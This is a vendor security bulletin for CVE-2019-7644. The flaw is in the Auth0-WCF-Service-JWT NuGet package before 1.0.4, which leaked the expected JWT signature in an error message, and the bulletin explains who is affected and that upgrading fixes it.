Docs

Metadata in Rules

Auth0 Security Bulletin CVE-2019-7644

Published: February 15, 2019

CVE number: CVE-2019-7644

Credit: Conny Dahlgren, Security Researcher at DevilSec AB

Read Metadata

Overview

All versions of Auth0-WCF-Service-JWT NuGet package lower than 1.0.4 include sensitive information about the expected JWT signature in an error message emitted when JWT signature validation fails:

This vulnerability allows attackers to use this error message to obtain a valid signature for arbitrary JWT tokens. This way attackers can forge tokens to bypass authentication and authorization mechanisms.

Read app_metadata

Am I affected?

You are affected by this vulnerability if the following conditions apply:

  • You use a version of Auth0-WCF-Service-JWT NuGet package lower than 1.0.4
  • You show signature verification exception message in the user interface or make it otherwise available to the attacker (for example through logs or diagnostic messages)

Read user_metadata

How to fix that?

Developers using the Auth0-WCF-Service-JWT library need to upgrade to the latest version 1.0.4.

The updated package is available on NuGet:

Read client_metadata

Will this update impact my users?

No. This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions.